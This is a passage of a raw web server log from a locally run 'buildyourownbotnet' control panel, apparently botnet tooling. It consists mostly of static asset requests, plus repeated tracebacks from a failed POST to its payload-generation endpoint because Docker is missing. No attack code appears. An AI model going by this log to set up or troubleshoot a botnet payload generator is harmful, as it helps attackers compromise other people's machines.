/assets/js/icheck/skins/minimal/_all.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/icheck/skins/square/_all.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/icheck/skins/flat/_all.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/icheck/skins/futurico/futurico.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/icheck/skins/polaris/polaris.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/bootstrap-tagsinput.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/selectboxit/jquery.selectBoxIt.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/typeahead.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/bootstrap-datepicker.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/bootstrap-timepicker.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/bootstrap-colorpicker.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/moment.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/daterangepicker/daterangepicker.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/jquery.multi-select.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/icheck/icheck.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/jvectormap/jquery-jvectormap-1.2.2.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/rickshaw/rickshaw.min.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/jvectormap/jquery-jvectormap-1.2.2.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/jquery.sparkline.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/rickshaw/vendor/d3.v3.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/rickshaw/rickshaw.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/raphael-min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/morris.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/toastr.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/custom/canvas-login.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/neon-demo.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/jvectormap/jquery-jvectormap-world-mill-en.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:56] "GET /assets/images/os/py.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:01] "GET /assets/images/byob_favicon_round-15.png HTTP/1.1" 304 - ERROR:buildyourownbotnet:Exception on /api/payload/generate [POST] Traceback (most recent call last): File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 2525, in wsgi_app response = self.full_dispatch_request() File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1822, in full_dispatch_request rv = self.handle_user_exception(e) File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1820, in full_dispatch_request rv = self.dispatch_request() File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1796, in dispatch_request return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) File "/usr/local/lib/python3.10/dist-packages/flask_login/utils.py", line 290, in decorated_view return current_app.ensure_sync(func)(*args, **kwargs) File "/home/rizqi/byob/web-gui/buildyourownbotnet/api/payload/routes.py", line 37, in payload_generate if freeze and subprocess.check_call(['which','docker']) != 0: File "/usr/lib/python3.10/subprocess.py", line 369, in check_call raise CalledProcessError(retcode, cmd) subprocess.CalledProcessError: Command '['which', 'docker']' returned non-zero exit status 1. INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:24] "POST /api/payload/generate HTTP/1.1" 500 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/js/jquery-ui/css/no-theme/jquery-ui-1.10.3.custom.min.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/css/font-icons/entypo/css/entypo.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/css/neon-core.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/css/bootstrap.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/css/neon-theme.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/css/neon-forms.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/css/custom.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/js/jquery-1.11.3.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/js/datatables/datatables.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/js/select2/select2-bootstrap.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/js/selectboxit/jquery.selectBoxIt.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/js/select2/select2.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /api/payload/assets/js/gsap/TweenMax.min.js HTTP/1.1" 404 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /api/payload/assets/js/jquery-ui/js/jquery-ui-1.10.3.minimal.min.js HTTP/1.1" 404 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /api/payload/assets/js/joinable.js HTTP/1.1" 404 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /api/payload/assets/js/bootstrap.js HTTP/1.1" 404 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /api/payload/assets/js/resizeable.js HTTP/1.1" 404 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/profile_pics/default_profile.jpg HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/images/byob_logo-12.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/js/selectboxit/jquery.selectBoxIt.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /api/payload/assets/js/datatables/datatables.js HTTP/1.1" 404 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /api/payload/assets/js/neon-api.js HTTP/1.1" 404 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /api/payload/assets/js/select2/select2.min.js HTTP/1.1" 404 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /api/payload/assets/js/neon-chat.js HTTP/1.1" 404 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /api/payload/assets/js/neon-custom.js HTTP/1.1" 404 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/js/daterangepicker/daterangepicker-bs3.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/js/icheck/skins/square/_all.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/js/icheck/skins/flat/_all.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/js/icheck/skins/futurico/futurico.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/fonts/TitilliumWeb-Light.ttf HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/css/font-icons/entypo/font/entypo.woff?71205724 HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/js/icheck/skins/polaris/polaris.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/js/gsap/TweenMax.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/js/jquery-ui/js/jquery-ui-1.10.3.minimal.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/js/joinable.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:25] "GET /assets/js/bootstrap.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/neon-api.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/select2/select2.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/bootstrap-tagsinput.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/typeahead.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/icheck/skins/minimal/_all.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/bootstrap-datepicker.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/bootstrap-timepicker.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/bootstrap-colorpicker.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/moment.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/daterangepicker/daterangepicker.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/icheck/icheck.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/neon-chat.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/neon-custom.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/resizeable.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/jvectormap/jquery-jvectormap-1.2.2.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/rickshaw/rickshaw.min.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/jvectormap/jquery-jvectormap-1.2.2.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/jvectormap/jquery-jvectormap-world-mill-en.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/jquery.sparkline.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/rickshaw/vendor/d3.v3.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/raphael-min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/rickshaw/rickshaw.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/morris.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/jquery.multi-select.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/toastr.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/custom/canvas-login.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/js/neon-demo.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/images/discord.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:26] "GET /assets/images/byob_favicon_round-15.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:27] "GET /assets/images/byob_favicon_round-15.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /payloads HTTP/1.1" 200 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/jquery-ui/css/no-theme/jquery-ui-1.10.3.custom.min.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/css/font-icons/entypo/css/entypo.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/css/bootstrap.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/css/neon-theme.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/css/neon-core.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/css/neon-forms.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/css/custom.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/jquery-1.11.3.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/select2/select2-bootstrap.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/datatables/datatables.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/select2/select2.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/selectboxit/jquery.selectBoxIt.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/css/font-icons/entypo/font/entypo.woff?71205724 HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/fonts/TitilliumWeb-Light.ttf HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/profile_pics/default_profile.jpg HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/images/byob_logo-12.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/gsap/TweenMax.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/jquery-ui/js/jquery-ui-1.10.3.minimal.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/bootstrap.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/joinable.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/resizeable.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/neon-api.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/selectboxit/jquery.selectBoxIt.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/datatables/datatables.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/select2/select2.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/neon-chat.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/neon-custom.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/daterangepicker/daterangepicker-bs3.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/icheck/skins/minimal/_all.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/icheck/skins/square/_all.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/icheck/skins/flat/_all.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/icheck/skins/futurico/futurico.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/icheck/skins/polaris/polaris.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/bootstrap-tagsinput.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/typeahead.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/bootstrap-datepicker.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/bootstrap-timepicker.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/bootstrap-colorpicker.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:31] "GET /assets/js/moment.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:32] "GET /assets/js/daterangepicker/daterangepicker.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:32] "GET /assets/js/jquery.multi-select.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:32] "GET /assets/js/icheck/icheck.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:32] "GET /assets/js/jvectormap/jquery-jvectormap-1.2.2.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:32] "GET /assets/js/rickshaw/rickshaw.min.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:32] "GET /assets/js/jvectormap/jquery-jvectormap-1.2.2.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:32] "GET /assets/js/jquery.sparkline.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:32] "GET /assets/js/jvectormap/jquery-jvectormap-world-mill-en.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:32] "GET /assets/js/rickshaw/vendor/d3.v3.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:32] "GET /assets/js/rickshaw/rickshaw.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:32] "GET /assets/js/raphael-min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:32] "GET /assets/js/neon-demo.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:32] "GET /assets/js/morris.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:32] "GET /assets/js/toastr.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:32] "GET /assets/js/custom/canvas-login.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:32] "GET /assets/images/os/py.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:32] "GET /assets/images/byob_favicon_round-15.png HTTP/1.1" 304 - ERROR:buildyourownbotnet:Exception on /api/payload/generate [POST] Traceback (most recent call last): File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 2525, in wsgi_app response = self.full_dispatch_request() File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1822, in full_dispatch_request rv = self.handle_user_exception(e) File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1820, in full_dispatch_request rv = self.dispatch_request() File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1796, in dispatch_request return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) File "/usr/local/lib/python3.10/dist-packages/flask_login/utils.py", line 290, in decorated_view return current_app.ensure_sync(func)(*args, **kwargs) File "/home/rizqi/byob/web-gui/buildyourownbotnet/api/payload/routes.py", line 37, in payload_generate if freeze and subprocess.check_call(['which','docker']) != 0: File "/usr/lib/python3.10/subprocess.py", line 369, in check_call raise CalledProcessError(retcode, cmd) subprocess.CalledProcessError: Command '['which', 'docker']' returned non-zero exit status 1. INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:47] "POST /api/payload/generate HTTP/1.1" 500 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:47] "GET /assets/js/jquery-ui/css/no-theme/jquery-ui-1.10.3.custom.min.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:47] "GET /assets/css/font-icons/entypo/css/entypo.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:47] "GET /assets/css/bootstrap.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:47] "GET /assets/css/neon-forms.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:47] "GET /assets/css/neon-core.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:47] "GET /assets/css/neon-theme.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:47] "GET /assets/css/custom.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:47] "GET /assets/js/jquery-1.11.3.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:47] "GET /assets/js/datatables/datatables.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:47] "GET /assets/js/select2/select2-bootstrap.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:47] "GET /assets/js/select2/select2.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:47] "GET /api/payload/assets/js/jquery-ui/js/jquery-ui-1.10.3.minimal.min.js HTTP/1.1" 404 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:47] "GET /assets/js/selectboxit/jquery.selectBoxIt.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:47] "GET /api/payload/assets/js/gsap/TweenMax.min.js HTTP/1.1" 404 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:47] "GET /assets/css/font-icons/entypo/font/entypo.woff?71205724 HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:47] "GET /assets/fonts/TitilliumWeb-Light.ttf HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:47] "GET /assets/profile_pics/default_profile.jpg HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:47] "GET /assets/images/byob_logo-12.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:47] "GET /api/payload/assets/js/bootstrap.js HTTP/1.1" 404 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:47] "GET /api/payload/assets/js/resizeable.js HTTP/1.1" 404 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:47] "GET /api/payload/assets/js/neon-api.js HTTP/1.1" 404 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:47] "GET /api/payload/assets/js/joinable.js HTTP/1.1" 404 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/selectboxit/jquery.selectBoxIt.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /api/payload/assets/js/datatables/datatables.js HTTP/1.1" 404 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /api/payload/assets/js/select2/select2.min.js HTTP/1.1" 404 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /api/payload/assets/js/neon-chat.js HTTP/1.1" 404 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /api/payload/assets/js/neon-custom.js HTTP/1.1" 404 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/daterangepicker/daterangepicker-bs3.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/icheck/skins/minimal/_all.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/icheck/skins/square/_all.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/icheck/skins/flat/_all.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/icheck/skins/futurico/futurico.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/icheck/skins/polaris/polaris.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/gsap/TweenMax.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/bootstrap.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/joinable.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/resizeable.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/select2/select2.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/bootstrap-tagsinput.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/typeahead.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/bootstrap-datepicker.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/bootstrap-timepicker.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/bootstrap-colorpicker.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/moment.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 